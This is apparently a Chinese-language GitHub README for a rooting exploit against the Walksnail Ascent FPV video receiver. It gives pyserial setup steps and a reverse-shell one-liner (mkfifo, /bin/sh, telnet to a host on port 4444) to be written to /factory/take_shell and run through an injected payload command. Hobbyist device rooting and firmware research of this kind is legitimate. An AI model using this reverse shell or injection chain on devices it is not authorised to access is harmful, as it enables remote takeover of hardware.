umeow0716/Walksnail-Ascent-FPV-VRX-Rooting-Exploit

# Walksnail-Ascent-FPV-VRX 提权漏洞 重要提示：操作系统必须为 **Windows**（主机 IP：192.168.3.103） 并在 `exploit.py` 的第 17 行修改 COM 编号 ``` python3 -m pip install pyserial python3 exploit.py ``` 你可以在 `/factory/take_shell` 中写入命令 ``` mkfifo /tmp/f; cat /tmp/f | tr -d '\r' | /bin/sh -i 2>&1 | telnet 192.168.3.103 4444 > /tmp/f ``` 然后 ``` $ sync ``` 然后在下次修改 `exploit.sh` 中的 PAYLOAD_CMD 为 `cat /factory/take_shell | sh` [漏洞详情](https://hackmd.io/@umeow0716/ryu63HDeGg) 如果你想[提取固件](https://github.com/umeow0716/extract-ascent-otra)

标签：Aarch64, FPV, Go语言工具, pyserial, Python, Telnet, USB升级服务, VRX, Walksnail Ascent, Windows主机, 云资产清单, 命令注入, 固件提取, 嵌入式系统, 应用安全, 无后门, 编程工具, 远程代码执行, 逆向工具, 逆向工程